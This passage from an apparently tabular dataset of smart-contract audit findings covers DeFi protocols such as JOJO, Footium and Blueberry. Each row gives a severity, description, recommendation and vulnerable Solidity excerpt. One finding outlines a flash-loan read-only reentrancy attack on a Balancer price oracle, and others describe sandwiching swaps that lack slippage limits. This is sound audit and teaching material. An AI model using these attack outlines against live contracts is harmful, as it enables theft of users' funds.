attacks when swapping USDC.,"```\\n function JOJOFlashLoan(\\n address asset,\\n uint256 amount,\\n address to,\\n bytes calldata param\\n ) external {\\n (address approveTarget, address swapTarget, uint256 minReceive, bytes memory data) = abi\\n .decode(param, (address, address, uint256, bytes));\\n IERC20(asset).approve(approveTarget, amount);\\n (bool success, ) = swapTarget.call(data);\\n if (success == false) {\\n assembly {\\n let ptr := mload(0x40)\\n let size := returndatasize()\\n returndatacopy(ptr, 0, size)\\n revert(ptr, size)\\n }\\n }\\n uint256 USDCAmount = IERC20(USDC).balanceOf(address(this));\\n require(USDCAmount >= minReceive, ""receive amount is too small"");\\n// rest of code\\n function repayJUSD(\\n address asset,\\n uint256 amount,\\n address to,\\n bytes memory param\\n ) external {\\n IERC20(asset).safeTransferFrom(msg.sender, address(this), amount);\\n uint256 minReceive;\\n if (asset != USDC) {\\n (address approveTarget, address swapTarget, uint256 minAmount, bytes memory data) = abi\\n .decode(param, (address, address, uint256, bytes));\\n IERC20(asset).approve(approveTarget, amount);\\n (bool success, ) = swapTarget.call(data);\\n if (success == false) {\\n assembly {\\n let ptr := mload(0x40)\\n let size := returndatasize()\\n returndatacopy(ptr, 0, size)\\n revert(ptr, size)\\n }\\n }\\n minReceive = minAmount;\\n }\\n\\n uint256 USDCAmount = IERC20(USDC).balanceOf(address(this));\\n require(USDCAmount >= minReceive, ""receive amount is too small"");\\n```\\n" +JUSDBank users can bypass individual collateral borrow limits,medium,"JUSDBank imposes individual borrow caps on each collateral. The issue is that this can be bypassed due to the fact that withdraw and borrow use different methods to determine if an account is safe.\\n```\\n function borrow(\\n uint256 amount,\\n address to,\\n bool isDepositToJOJO\\n ) external override nonReentrant nonFlashLoanReentrant{\\n // t0BorrowedAmount = borrowedAmount / getT0Rate\\n DataTypes.UserInfo storage user = userInfo[msg.sender];\\n _borrow(user, isDepositToJOJO, to, amount, msg.sender);\\n require(\\n _isAccountSafeAfterBorrow(user, getTRate()),\\n JUSDErrors.AFTER_BORROW_ACCOUNT_IS_NOT_SAFE\\n );\\n }\\n```\\n\\nWhen borrowing the contract calls _isAccountSafeAfterBorrow. This imposes a max borrow on each collateral type that guarantees that the user cannot borrow more than the max for each collateral type. The issues is that withdraw doesn't impose this cap. This allows a user to bypass this cap as shown in the example below.\\nExample: Assume WETH and WBTC both have a cap of 10,000 borrow. The user deposits $30,000 WETH and takes a flashloand for $30,000 WBTC. Now they deposit both and borrow 20,000 JUSD. They then withdraw all their WBTC to repay the flashloan and now they have borrowed 20,000 against $30000 in WETH",Always use _isAccountSafeAfterBorrow,Deposit caps can be easily surpassed creating systematic risk for the system,"```\\n function borrow(\\n uint256 amount,\\n address to,\\n bool isDepositToJOJO\\n ) external override nonReentrant nonFlashLoanReentrant{\\n // t0BorrowedAmount = borrowedAmount / getT0Rate\\n DataTypes.UserInfo storage user = userInfo[msg.sender];\\n _borrow(user, isDepositToJOJO, to, amount, msg.sender);\\n require(\\n _isAccountSafeAfterBorrow(user, getTRate()),\\n JUSDErrors.AFTER_BORROW_ACCOUNT_IS_NOT_SAFE\\n );\\n }\\n```\\n" +GeneralRepay#repayJUSD returns excess USDC to `to` address rather than msg.sender,medium,"When using GeneralRepay#repayJUSD `to` repay a position on JUSDBank, any excess tokens are sent `to` the `to` address. While this is fine for users that are repaying their own debt this is not good when repaying for another user. Additionally, specifying an excess `to` repay is basically a requirement when attempting `to` pay off the entire balance of an account. This combination of factors will make it very likely that funds will be refunded incorrectly.\\n```\\n IERC20(USDC).approve(jusdExchange, borrowBalance);\\n IJUSDExchange(jusdExchange).buyJUSD(borrowBalance, address(this));\\n IERC20(USDC).safeTransfer(to, USDCAmount - borrowBalance);\\n JUSDAmount = borrowBalance;\\n }\\n```\\n\\nAs seen above, when there is an excess amount of USDC, it is transferred `to` the `to` address which is the recipient of the repay. When `to` != msg.sender all excess will be sent `to` the recipient of the repay rather than being refunded `to` the caller.",Either send the excess back to the caller or allow them to specify where the refund goes,Refund is sent to the wrong address if to != msg.sender,"```\\n IERC20(USDC).approve(jusdExchange, borrowBalance);\\n IJUSDExchange(jusdExchange).buyJUSD(borrowBalance, address(this));\\n IERC20(USDC).safeTransfer(to, USDCAmount - borrowBalance);\\n JUSDAmount = borrowBalance;\\n }\\n```\\n" +Certain ERC20 token does not return bool from approve and transfer and transaction revert,medium,"Certain ERC20 token does not return bool from approve and transfer and transaction revert\\nAccording to\\nSome tokens do not return a bool on ERC20 methods and use IERC20 token interface will revert transaction\\nCertain ERC20 token does not return bool from approve and transfer and transaction revert\\n```\\n function setApprovalForERC20(\\n IERC20 erc20Contract,\\n address to,\\n uint256 amount\\n ) external onlyClubOwner {\\n erc20Contract.approve(to, amount);\\n }\\n```\\n\\nand\\n```\\nfunction transferERC20(\\n IERC20 erc20Contract,\\n address to,\\n uint256 amount\\n) external onlyClubOwner {\\n erc20Contract.transfer(to, amount);\\n}\\n```\\n\\nthe transfer / approve can fail slienlty",Issue Certain ERC20 token does not return bool from approve and transfer and transaction revert\\nUse Openzeppelin SafeTransfer / SafeApprove,Some tokens do not return a bool on ERC20 methods and use IERC20 token interface will revert transaction,"```\\n function setApprovalForERC20(\\n IERC20 erc20Contract,\\n address to,\\n uint256 amount\\n ) external onlyClubOwner {\\n erc20Contract.approve(to, amount);\\n }\\n```\\n" +Users might lose funds as `claimERC20Prize()` doesn't revert for no-revert-on-transfer tokens,medium,"Users can call `claimERC20Prize()` without actually receiving tokens if a no-revert-on-failure token is used, causing a portion of their claimable tokens to become unclaimable.\\nIn the `FootiumPrizeDistributor` contract, whitelisted users can call `claimERC20Prize()` to claim ERC20 tokens. The function adds the amount of tokens claimed to the user's total claim amount, and then transfers the tokens to the user:\\nFootiumPrizeDistributor.sol#L128-L131\\n```\\nif (value > 0) {\\n totalERC20Claimed[_token][_to] += value;\\n _token.transfer(_to, value);\\n}\\n```\\n\\nAs the the return value from `transfer()` is not checked, `claimERC20Prize()` does not revert even when the transfer of tokens to the user fails.\\nThis could potentially cause users to lose assets when:\\n`_token` is a no-revert-on-failure token.\\nThe user calls `claimERC20Prize()` with `value` higher than the contract's token balance.\\nAs the contract has an insufficient balance, `transfer()` will revert and the user receives no tokens. However, as `claimERC20Prize()` succeeds, `totalERC20Claimed` is permanently increased for the user, thus the user cannot claim these tokens again.",Use `safeTransfer()` from Openzeppelin's SafeERC20 to transfer ERC20 tokens. Note that `transferERC20()` in `FootiumEscrow.sol` also uses `transfer()` and is susceptible to the same vulnerability.,"Users can call `claimERC20Prize()` without receiving the token amount specified. These tokens become permanently unclaimable for the user, leading to a loss of funds.","```\\nif (value > 0) {\\n totalERC20Claimed[_token][_to] += value;\\n _token.transfer(_to, value);\\n}\\n```\\n" +Users can bypass Player royalties on EIP2981 compatible markets by selling clubs as a whole,medium,"Players have a royalty built in but clubs do not. This allows bulk sale of players via clubs to bypass the fee when selling players.\\nFootiumPlayer.sol#L16-L23\\n```\\ncontract FootiumPlayer is\\n ERC721Upgradeable,\\n AccessControlUpgradeable,\\n ERC2981Upgradeable,\\n PausableUpgradeable,\\n ReentrancyGuardUpgradeable,\\n OwnableUpgradeable\\n{\\n```\\n\\nFootiumPlayer implements the EIP2981 standard which creates fees when buy/selling the players.\\nFootiumClub.sol#L15-L21\\n```\\ncontract FootiumClub is\\n ERC721Upgradeable,\\n AccessControlUpgradeable,\\n PausableUpgradeable,\\n ReentrancyGuardUpgradeable,\\n OwnableUpgradeable\\n{\\n```\\n\\nFootiumClub on the other hand never implements this standard. This allows users to sell players by selling their club to avoid any kind of fee on player sales.",Implement EIP2981 on clubs as well,Users can bypass fees on player sales by selling club instead,"```\\ncontract FootiumPlayer is\\n ERC721Upgradeable,\\n AccessControlUpgradeable,\\n ERC2981Upgradeable,\\n PausableUpgradeable,\\n ReentrancyGuardUpgradeable,\\n OwnableUpgradeable\\n{\\n```\\n" +Merkle leaf values for _clubDivsMerkleRoot are 64 bytes before hashing which can lead to merkle tree collisions,medium,"FootiumAcademy hashes 64 bytes when calculating leaf allowing it to collide with the internal nodes of the merkle tree.\\nMerkleProofUpgradeable.sol puts the following warning at the beginning of the contract:\\n```\\n * WARNING: You should avoid using leaf values that are 64 bytes long prior to\\n * hashing, or use a hash function other than keccak256 for hashing leaves.\\n * This is because the concatenation of a sorted pair of internal nodes in\\n * the merkle tree could be reinterpreted as a leaf value.\\n```\\n\\nFootiumAcademy.sol#L235-L240\\n```\\n if (\\n !MerkleProofUpgradeable.verify(\\n divisionProof,\\n _clubDivsMerkleRoot,\\n keccak256(abi.encodePacked(clubId, divisionTier)) <- @audit-issue 64 bytes before hashing allows collisions with internal nodes\\n )\\n```\\n\\nThis is problematic because FootiumAcademy uses clubId and divisionTier as the base of the leaf, which are both uint256 (32 bytes each for 64 bytes total). This allows collision between leaves and internal nodes. These collisions could allow users to mint to divisions that otherwise would be impossible.",Use a combination of variables that doesn't sum to 64 bytes,Users can abuse merkle tree collisions to mint in non-existent divisions and bypass minting fees,"```\\n * WARNING: You should avoid using leaf values that are 64 bytes long prior to\\n * hashing, or use a hash function other than keccak256 for hashing leaves.\\n * This is because the concatenation of a sorted pair of internal nodes in\\n * the merkle tree could be reinterpreted as a leaf value.\\n```\\n" +AuraSpell#openPositionFarm uses incorrect join type for balancer,high,"The JoinPoolRequest uses """" for userData meaning that it will decode into 0. This is problematic because join requests of type 0 are ""init"" type joins and will revert for pools that are already initialized.\\n```\\nenum JoinKind { INIT, EXACT_TOKENS_IN_FOR_BPT_OUT, TOKEN_IN_FOR_EXACT_BPT_OUT }\\n```\\n\\nWe see above that enum JoinKind is INIT for 0 values.\\n```\\n return _joinExactTokensInForBPTOut(balances, normalizedWeights, userData);\\n } else if (kind == JoinKind.TOKEN_IN_FOR_EXACT_BPT_OUT) {\\n return _joinTokenInForExactBPTOut(balances, normalizedWeights, userData);\\n } else {\\n _revert(Errors.UNHANDLED_JOIN_KIND);\\n }\\n```\\n\\nHere user data is decoded into join type and since it is """" it will decode to type 0 which will result in a revert.",Uses JoinKind = 1 for user data,Users will be unable to open any farm position on AuraSpell,"```\\nenum JoinKind { INIT, EXACT_TOKENS_IN_FOR_BPT_OUT, TOKEN_IN_FOR_EXACT_BPT_OUT }\\n```\\n" +Users are forced to swap all reward tokens with no slippage protection,high,"AuraSpell forces users to swap their reward tokens to debt token but doesn't allow them to specify any slippage values.\\nAuraSpell.sol#L193-L203\\n```\\n for (uint256 i = 0; i < rewardTokens.length; i++) {\\n uint256 rewards = _doCutRewardsFee(rewardTokens[i]);\\n _ensureApprove(rewardTokens[i], address(swapRouter), rewards);\\n swapRouter.swapExactTokensForTokens(\\n rewards,\\n 0,\\n swapPath[i],\\n address(this),\\n type(uint256).max\\n );\\n }\\n```\\n\\nAbove all reward tokens are swapped and always use 0 for min out meaning that deposits will be sandwiched and stolen.",Allow user to specify slippage parameters for all reward tokens,All reward tokens can be sandwiched and stolen,"```\\n for (uint256 i = 0; i < rewardTokens.length; i++) {\\n uint256 rewards = _doCutRewardsFee(rewardTokens[i]);\\n _ensureApprove(rewardTokens[i], address(swapRouter), rewards);\\n swapRouter.swapExactTokensForTokens(\\n rewards,\\n 0,\\n swapPath[i],\\n address(this),\\n type(uint256).max\\n );\\n }\\n```\\n" +ConvexSpell#closePositionFarm removes liquidity without any slippage protection,high,"ConvexSpell#closePositionFarm removes liquidity without any slippage protection allowing withdraws to be sandwiched and stolen. Curve liquidity has historically been strong but for smaller pairs their liquidity is getting low enough that it can be manipulated via flashloans.\\nConvexSpell.sol#L204-L208\\n```\\n ICurvePool(pool).remove_liquidity_one_coin(\\n amountPosRemove,\\n int128(tokenIndex),\\n 0\\n );\\n```\\n\\nLiquidity is removed as a single token which makes it vulnerable to sandwich attacks but no slippage protection is implemented. The same issue applies to CurveSpell.",Issue ConvexSpell#closePositionFarm removes liquidity without any slippage protection\\nAllow user to specify min out,User withdrawals can be sandwiched,"```\\n ICurvePool(pool).remove_liquidity_one_coin(\\n amountPosRemove,\\n int128(tokenIndex),\\n 0\\n );\\n```\\n" +WAuraPools will irreversibly break if reward tokens are added to pool after deposit,high,"WAuraPools will irreversibly break if reward tokens are added to pool after deposit due to an OOB error on accExtPerShare.\\nWAuraPools.sol#L166-L189\\n```\\n uint extraRewardsCount = IAuraRewarder(crvRewarder)\\n .extraRewardsLength(); <- @audit-issue rewardTokenCount pulled fresh\\n tokens = new address[](extraRewardsCount + 1);\\n rewards = new uint256[](extraRewardsCount + 1);\\n\\n tokens[0] = IAuraRewarder(crvRewarder).rewardToken();\\n rewards[0] = _getPendingReward(\\n stCrvPerShare,\\n crvRewarder,\\n amount,\\n lpDecimals\\n );\\n\\n for (uint i = 0; i < extraRewardsCount; i++) {\\n address rewarder = IAuraRewarder(crvRewarder).extraRewards(i);\\n\\n @audit-issue attempts to pull from array which will be too small if tokens are added\\n uint256 stRewardPerShare = accExtPerShare[tokenId][i];\\n tokens[i + 1] = IAuraRewarder(rewarder).rewardToken();\\n rewards[i + 1] = _getPendingReward(\\n stRewardPerShare,\\n rewarder,\\n amount,\\n lpDecimals\\n );\\n }\\n```\\n\\naccExtPerShare stores the current rewardPerToken when the position is first created. It stores it as an array and only stores values for reward tokens that have been added prior to minting. This creates an issue if a reward token is added because now it will attempt to pull a value for an index that doesn't exist and throw an OOB error.\\nThis is problematic because pendingRewards is called every single transaction via the isLiquidatable subcall in BlueBerryBank#execute.",Use a mapping rather than an array to store values,WAuraPools will irreversibly break if reward tokens are added to pool after,"```\\n uint extraRewardsCount = IAuraRewarder(crvRewarder)\\n .extraRewardsLength(); <- @audit-issue rewardTokenCount pulled fresh\\n tokens = new address[](extraRewardsCount + 1);\\n rewards = new uint256[](extraRewardsCount + 1);\\n\\n tokens[0] = IAuraRewarder(crvRewarder).rewardToken();\\n rewards[0] = _getPendingReward(\\n stCrvPerShare,\\n crvRewarder,\\n amount,\\n lpDecimals\\n );\\n\\n for (uint i = 0; i < extraRewardsCount; i++) {\\n address rewarder = IAuraRewarder(crvRewarder).extraRewards(i);\\n\\n @audit-issue attempts to pull from array which will be too small if tokens are added\\n uint256 stRewardPerShare = accExtPerShare[tokenId][i];\\n tokens[i + 1] = IAuraRewarder(rewarder).rewardToken();\\n rewards[i + 1] = _getPendingReward(\\n stRewardPerShare,\\n rewarder,\\n amount,\\n lpDecimals\\n );\\n }\\n```\\n" +UserData for balancer pool exits is malformed and will permanently trap users,high,"UserData for balancer pool exits is malformed and will result in all withdrawal attempts failing, trapping the user permanently.\\nAuraSpell.sol#L184-L189\\n```\\nwAuraPools.getVault(lpToken).exitPool(\\n IBalancerPool(lpToken).getPoolId(),\\n address(this),\\n address(this),\\n IBalancerVault.ExitPoolRequest(tokens, minAmountsOut, """", false)\\n);\\n```\\n\\nWe see above that UserData is encoded as """". This is problematic as it doesn't contain the proper data for exiting the pool, causing all exit request to fail and trap the user permanently.\\n```\\nfunction exactBptInForTokenOut(bytes memory self) internal pure returns (uint256 bptAmountIn, uint256 tokenIndex) {\\n (, bptAmountIn, tokenIndex) = abi.decode(self, (WeightedPool.ExitKind, uint256, uint256));\\n}\\n```\\n\\nUserData is decoded into the data shown above when using ExitKind = 0. Since the exit uses """" as the user data this will be decoded as 0 a.k.a EXACT_BPT_IN_FOR_ONE_TOKEN_OUT. This is problematic because the token index and bptAmountIn should also be encoded in user data for this kind of exit. Since it isn't the exit call will always revert and the user will be permanently trapped.",Encode the necessary exit data in userData,"Users will be permanently trapped, unable to withdraw","```\\nwAuraPools.getVault(lpToken).exitPool(\\n IBalancerPool(lpToken).getPoolId(),\\n address(this),\\n address(this),\\n IBalancerVault.ExitPoolRequest(tokens, minAmountsOut, """", false)\\n);\\n```\\n" +UniswapV3 sqrtRatioLimit doesn't provide slippage protection and will result in partial swaps,high,"The sqrtRatioLimit for UniV3 doesn't cause the swap to revert upon reaching that value. Instead it just cause the swap to partially fill. This is a known issue with using sqrtRatioLimit as can be seen here where the swap ends prematurely when it has been reached. This is problematic as this is meant to provide the user with slippage protection but doesn't.\\n```\\n if (amountToSwap > 0) {\\n SWAP_POOL = IUniswapV3Pool(vault.pool());\\n uint160 deltaSqrt = (param.sqrtRatioLimit *\\n uint160(param.sellSlippage)) / uint160(Constants.DENOMINATOR);\\n SWAP_POOL.swap(\\n address(this),\\n // if withdraw token is Token0, then swap token1 -> token0 (false)\\n !isTokenA,\\n amountToSwap.toInt256(),\\n isTokenA\\n ? param.sqrtRatioLimit + deltaSqrt\\n : param.sqrtRatioLimit - deltaSqrt, // slippaged price cap\\n abi.encode(address(this))\\n );\\n }\\n```\\n\\nsqrtRatioLimit is used as slippage protection for the user but is ineffective and depending on what tokens are being swapped, tokens may be left the in the contract which can be stolen by anyone.",Check the amount received from the swap and compare it against some user supplied minimum,Incorrect slippage application can result in partial swaps and loss of funds,"```\\n if (amountToSwap > 0) {\\n SWAP_POOL = IUniswapV3Pool(vault.pool());\\n uint160 deltaSqrt = (param.sqrtRatioLimit *\\n uint160(param.sellSlippage)) / uint160(Constants.DENOMINATOR);\\n SWAP_POOL.swap(\\n address(this),\\n // if withdraw token is Token0, then swap token1 -> token0 (false)\\n !isTokenA,\\n amountToSwap.toInt256(),\\n isTokenA\\n ? param.sqrtRatioLimit + deltaSqrt\\n : param.sqrtRatioLimit - deltaSqrt, // slippaged price cap\\n abi.encode(address(this))\\n );\\n }\\n```\\n" +Balance check for swapToken in ShortLongSpell#_deposit is incorrect and will result in nonfunctional contract,high,"The balance checks on ShortLongSpell#_withdraw are incorrect and will make contract basically nonfunctional\\nswapToken is always vault.uToken. borrowToken is always required to be vault.uToken which means that swapToken == borrowToken. This means that the token borrowed is always required to be swapped.\\nShortLongSpell.sol#L83-L89\\n```\\n uint256 strTokenAmt = _doBorrow(param.borrowToken, param.borrowAmount);\\n\\n // 3. Swap borrowed token to strategy token\\n IERC20Upgradeable swapToken = ISoftVault(strategy.vault).uToken();\\n // swapData.fromAmount = strTokenAmt;\\n PSwapLib.megaSwap(augustusSwapper, tokenTransferProxy, swapData);\\n strTokenAmt = swapToken.balanceOf(address(this)) - strTokenAmt; <- @audit-issue will always revert on swap\\n```\\n\\nBecause swapToken == borrowToken if there is ever a swap then the swapToken balance will decrease. This causes L89 to always revert when a swap happens, making the contract completely non-functional",Remove check,ShortLongSpell is nonfunctional,"```\\n uint256 strTokenAmt = _doBorrow(param.borrowToken, param.borrowAmount);\\n\\n // 3. Swap borrowed token to strategy token\\n IERC20Upgradeable swapToken = ISoftVault(strategy.vault).uToken();\\n // swapData.fromAmount = strTokenAmt;\\n PSwapLib.megaSwap(augustusSwapper, tokenTransferProxy, swapData);\\n strTokenAmt = swapToken.balanceOf(address(this)) - strTokenAmt; <- @audit-issue will always revert on swap\\n```\\n" +ShortLongSpell#openPosition can cause user unexpected liquidation when increasing position size,high,"When increasing a position, all collateral is sent to the user rather than being kept in the position. This can cause serious issues because this collateral keeps the user from being liquidated. It may unexpectedly leave the user on the brink of liquidation where a small change in price leads to their liquidation.\\nShortLongSpell.sol#L129-L141\\n```\\n {\\n IBank.Position memory pos = bank.getCurrentPositionInfo();\\n address posCollToken = pos.collToken;\\n uint256 collSize = pos.collateralSize;\\n address burnToken = address(ISoftVault(strategy.vault).uToken());\\n if (collSize > 0) {\\n if (posCollToken != address(wrapper))\\n revert Errors.INCORRECT_COLTOKEN(posCollToken);\\n bank.takeCollateral(collSize);\\n wrapper.burn(burnToken, collSize);\\n _doRefund(burnToken);\\n }\\n }\\n```\\n\\nIn the above lines we can see that all collateral is burned and the user is sent the underlying tokens. This is problematic as it sends all the collateral to the user, leaving the position collateralized by only the isolated collateral.\\nBest case the user's transaction reverts but worst case they will be liquidated almost immediately.",Don't burn the collateral,Unfair liquidation for users,"```\\n {\\n IBank.Position memory pos = bank.getCurrentPositionInfo();\\n address posCollToken = pos.collToken;\\n uint256 collSize = pos.collateralSize;\\n address burnToken = address(ISoftVault(strategy.vault).uToken());\\n if (collSize > 0) {\\n if (posCollToken != address(wrapper))\\n revert Errors.INCORRECT_COLTOKEN(posCollToken);\\n bank.takeCollateral(collSize);\\n wrapper.burn(burnToken, collSize);\\n _doRefund(burnToken);\\n }\\n }\\n```\\n" +Pending CRV rewards are not accounted for and can cause unfair liquidations,high,"pendingRewards are factored into the health of a position so that the position collateral is fairly assessed. However WCurveGauge#pendingRewards doesn't return the proper reward tokens/amounts meaning that positions aren't valued correctly and users can be unfairly liquidated.\\nBlueBerryBank.sol#L408-L413\\n```\\n (address[] memory tokens, uint256[] memory rewards) = IERC20Wrapper(\\n pos.collToken\\n ).pendingRewards(pos.collId, pos.collateralSize);\\n for (uint256 i; i < tokens.length; i++) {\\n rewardsValue += oracle.getTokenValue(tokens[i], rewards[i]);\\n }\\n```\\n\\nWhen BlueBerryBank is valuing a position it also values the pending rewards since they also have value.\\nWCurveGauge.sol#L106-L114\\n```\\nfunction pendingRewards(\\n uint256 tokenId,\\n uint256 amount\\n)\\n public\\n view\\n override\\n returns (address[] memory tokens, uint256[] memory rewards)\\n{}\\n```\\n\\nAbove we see that WCurveGauge#pendingRewards returns empty arrays when called. This means that pending rewards are not factored in correctly and users can be liquidated when even when they should be safe.",Change WCurveGauge#pendingRewards to correctly return the pending rewards,User is liquidated when they shouldn't be,"```\\n (address[] memory tokens, uint256[] memory rewards) = IERC20Wrapper(\\n pos.collToken\\n ).pendingRewards(pos.collId, pos.collateralSize);\\n for (uint256 i; i < tokens.length; i++) {\\n rewardsValue += oracle.getTokenValue(tokens[i], rewards[i]);\\n }\\n```\\n" +`BalancerPairOracle` can be manipulated using read-only reentrancy,high,"`BalancerPairOracle.getPrice` makes an external call to `BalancerVault.getPoolTokens` without checking the Balancer Vault's reentrancy guard. As a result, the oracle can be trivially manipulated to liquidate user positions prematurely.\\nIn February, the Balancer team disclosed a read-only reentrancy vulnerability in the Balancer Vault. The detailed disclosure can be found here. In short, all Balancer pools are susceptible to manipulation of their external queries, and all integrations must now take an extra step of precaution when consuming data. Via reentrancy, an attacker can force token balances and BPT supply to be out of sync, creating very inaccurate BPT prices.\\nSome protocols, such as Sentiment, remained unaware of this issue for a few months and were later hacked as a result.\\n`BalancerPairOracle.getPrice` makes a price calculation of the form `f(balances) / pool.totalSupply()`, so it is clearly vulnerable to synchronization issues between the two data points. A rough outline of the attack might look like this:\\n```\\nAttackerContract.flashLoan() ->\\n // Borrow lots of tokens and trigger a callback.\\n SomeProtocol.flashLoan() ->\\n AttackerContract.exploit()\\n\\nAttackerContract.exploit() ->\\n // Join a Balancer Pool using the borrowed tokens and send some ETH along with the call.\\n BalancerVault.joinPool() ->\\n // The Vault will return the excess ETH to the sender, which will reenter this contract.\\n // At this point in the execution, the BPT supply has been updated but the token balances have not.\\n AttackerContract.receive()\\n\\nAttackerContract.receive() ->\\n // Liquidate a position using the same Balancer Pool as collateral.\\n BlueBerryBank.liquidate() ->\\n // Call to the oracle to check the price.\\n BalancerPairOracle.getPrice() ->\\n // Query the token balances. At this point in the execution, these have not been updated (see above).\\n // So, the balances are still the same as before the start of the large pool join.\\n BalancerVaul.getPoolTokens()\\n\\n // Query the BPT supply. At this point in the execution, the supply has already been updated (see above).\\n // So, it includes the latest large pool join, and as such the BPT supply has grown by a large amount.\\n BalancerPool.getTotalSupply()\\n\\n // Now the price is computed using both balances and supply, and the result is much smaller than it should be.\\n price = f(balances) / pool.totalSupply()\\n\\n // The position is liquidated under false pretenses.\\n```\\n","The Balancer team recommends utilizing their official library to safeguard queries such as `Vault.getPoolTokens`. However, the library makes a state-modifying call to the Balancer Vault, so it is not suitable for `view` functions such as `BalancerPairOracle.getPrice`. There are then two options:\\nInvoke the library somewhere else. Perhaps insert a hook into critical system functions like `BlueBerryBank.liquidate`.\\nAdapt a slightly different read-only solution that checks the Balancer Vault's reentrancy guard without actually entering.",Users choosing Balancer pool positions (such as Aura vaults) as collateral can be prematurely liquidated due to unreliable price data.,"```\\nAttackerContract.flashLoan() ->\\n // Borrow lots of tokens and trigger a callback.\\n SomeProtocol.flashLoan() ->\\n AttackerContract.exploit()\\n\\nAttackerContract.exploit() ->\\n // Join a Balancer Pool using the borrowed tokens and send some ETH along with the call.\\n BalancerVault.joinPool() ->\\n // The Vault will return the excess ETH to the sender, which will reenter this contract.\\n // At this point in the execution, the BPT supply has been updated but the token balances have not.\\n AttackerContract.receive()\\n\\nAttackerContract.receive() ->\\n // Liquidate a position using the same Balancer Pool as collateral.\\n BlueBerryBank.liquidate() ->\\n // Call to the oracle to check the price.\\n BalancerPairOracle.getPrice() ->\\n // Query the token balances. At this point in the execution, these have not been updated (see above).\\n // So, the balances are still the same as before the start of the large pool join.\\n BalancerVaul.getPoolTokens()\\n\\n // Query the BPT supply. At this point in the execution, the supply has already been updated (see above).\\n // So, it includes the latest large pool join, and as such the BPT supply has grown by a large amount.\\n BalancerPool.getTotalSupply()\\n\\n // Now the price is computed using both balances and supply, and the result is much smaller than it should be.\\n price = f(balances) / pool.totalSupply()\\n\\n // The position is liquidated under false pretenses.\\n```\\n" +"Deadline check is not effective, allowing outdated slippage and allow pending transaction to be unexpected executed",high,"Deadline check is not effective, allowing outdated slippage and allow pending transaction to be unexpected executed\\nIn the current implementation in CurveSpell.sol\\n```\\n{\\n // 2. Swap rewards tokens to debt token\\n uint256 rewards = _doCutRewardsFee(CRV);\\n _ensureApprove(CRV, address(swapRouter), rewards);\\n swapRouter.swapExactTokensForTokens(\\n rewards,\\n 0,\\n swapPath,\\n address(this),\\n type(uint256).max\\n );\\n}\\n```\\n\\nthe deadline check is set to type(uint256).max, which means the deadline check is disabled!\\nIn IChiSpell. the swap is directedly call on the pool instead of the router\\n```\\nSWAP_POOL.swap(\\n address(this),\\n // if withdraw token is Token0, then swap token1 -> token0 (false)\\n !isTokenA,\\n amountToSwap.toInt256(),\\n isTokenA\\n ? param.sqrtRatioLimit + deltaSqrt\\n : param.sqrtRatioLimit - deltaSqrt, // slippaged price cap\\n abi.encode(address(this))\\n);\\n```\\n\\nand it has no deadline check for the transaction when swapping",We recommend the protocol use block.timstamp for swapping deadline for Uniswap V2 and swap with Unsiwap Router V3 instead of the pool directly!,"AMMs provide their users with an option to limit the execution of their pending actions, such as swaps or adding and removing liquidity. The most common solution is to include a deadline timestamp as a parameter (for example see Uniswap V2 and Uniswap V3). If such an option is not present, users can unknowingly perform bad trades:\\nAlice wants to swap 100 tokens for 1 ETH and later sell the 1 ETH for 1000 DAI.\\nThe transaction is submitted to the mempool, however, Alice chose a transaction fee that is too low for miners to be interested in including her transaction in a block. The transaction stays pending in the mempool for extended periods, which could be hours, days, weeks, or even longer.\\nWhen the average gas fee dropped far enough for Alice's transaction to become interesting again for miners to include it, her swap will be executed. In the meantime, the price of ETH could have drastically changed. She will still get 1 ETH but the DAI value of that output might be significantly lower.\\nShe has unknowingly performed a bad trade due to the pending transaction she forgot about.\\nAn even worse way this issue can be maliciously exploited is through MEV:\\nThe swap transaction is still pending in the mempool. Average fees are still too high for miners to be interested in it.\\nThe price of tokens has gone up significantly since the transaction was signed, meaning Alice would receive a lot more ETH when the swap is executed. But that also means that her maximum slippage value (sqrtPriceLimitX96 and minOut in terms of the Spell contracts) is outdated and would allow for significant slippage.\\nA MEV bot detects the pending transaction. Since the outdated maximum slippage value now allows for high slippage, the bot sandwiches Alice, resulting in significant profit for the bot and significant loss for Alice.","```\\n{\\n // 2. Swap rewards tokens to debt token\\n uint256 rewards = _doCutRewardsFee(CRV);\\n _ensureApprove(CRV, address(swapRouter), rewards);\\n swapRouter.swapExactTokensForTokens(\\n rewards,\\n 0,\\n swapPath,\\n address(this),\\n type(uint256).max\\n );\\n}\\n```\\n" +AuraSpell openPositionFarm does not join pool,medium,"The function to open a position for the AuraSpell does not join the pool due to wrong conditional check.\\nThe function deposits collateral into the bank, borrow tokens, and attempts to join the pool:\\n```\\n function openPositionFarm(\\n OpenPosParam calldata param\\n )\\n external\\n existingStrategy(param.strategyId)\\n existingCollateral(param.strategyId, param.collToken)\\n {\\n // rest of code\\n // 1. Deposit isolated collaterals on Blueberry Money Market\\n _doLend(param.collToken, param.collAmount);\\n\\n // 2. Borrow specific amounts\\n uint256 borrowBalance = _doBorrow(\\n param.borrowToken,\\n param.borrowAmount\\n );\\n\\n // 3. Add liquidity on Balancer, get BPT\\n {\\n IBalancerVault vault = wAuraPools.getVault(lpToken);\\n _ensureApprove(param.borrowToken, address(vault), borrowBalance);\\n\\n (address[] memory tokens, uint256[] memory balances, ) = wAuraPools\\n .getPoolTokens(lpToken);\\n uint[] memory maxAmountsIn = new uint[](2);\\n maxAmountsIn[0] = IERC20(tokens[0]).balanceOf(address(this));\\n maxAmountsIn[1] = IERC20(tokens[1]).balanceOf(address(this));\\n\\n uint totalLPSupply = IBalancerPool(lpToken).totalSupply();\\n // compute in reverse order of how Balancer's `joinPool` computes tokenAmountIn\\n uint poolAmountFromA = (maxAmountsIn[0] * totalLPSupply) /\\n balances[0];\\n uint poolAmountFromB = (maxAmountsIn[1] * totalLPSupply) /\\n balances[1];\\n uint poolAmountOut = poolAmountFromA > poolAmountFromB\\n ? poolAmountFromB\\n : poolAmountFromA;\\n\\n bytes32 poolId = bytes32(param.farmingPoolId);\\n if (poolAmountOut > 0) {\\n vault.joinPool(\\n poolId,\\n address(this),\\n address(this),\\n IBalancerVault.JoinPoolRequest(\\n tokens,\\n maxAmountsIn,\\n """",\\n false\\n )\\n );\\n }\\n }\\n // rest of code\\n }\\n```\\n\\nThe function only borrowed one type of tokens from the bank so the contract only owns one type of token. As a result one of the `maxAmountsIn` value is 0. Either `poolAmountFromA` or `poolAmountFromB` is 0 as a result of computation. `poolAmountOut` is the minimal value of `poolAmountFromA` and `poolAmountFromB`, it is 0. The following check `if (poolAmountOut > 0)` will always fail and the pool will never be 